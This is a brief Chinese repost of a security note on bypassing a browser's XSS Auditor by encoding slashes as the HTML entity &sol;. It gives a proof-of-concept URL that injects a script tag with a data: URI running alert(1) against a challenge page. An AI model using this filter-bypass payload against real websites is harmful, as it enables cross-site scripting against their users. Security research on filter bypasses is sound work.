http://zone.wooyun.org/content/20180 原文地址: http://www.thespanner.co.uk/2015/02/19/another-xss-auditor-bypass/ 将/HTML实体编码成/绕过xss auditor POC: http://challenge.hackvertor.co.uk/script3.php?x=%22%3E%3Cscript/src=data:,alert(1)%26sol;%26sol; 转载于:https://blog.51cto.com/webrobot/1660457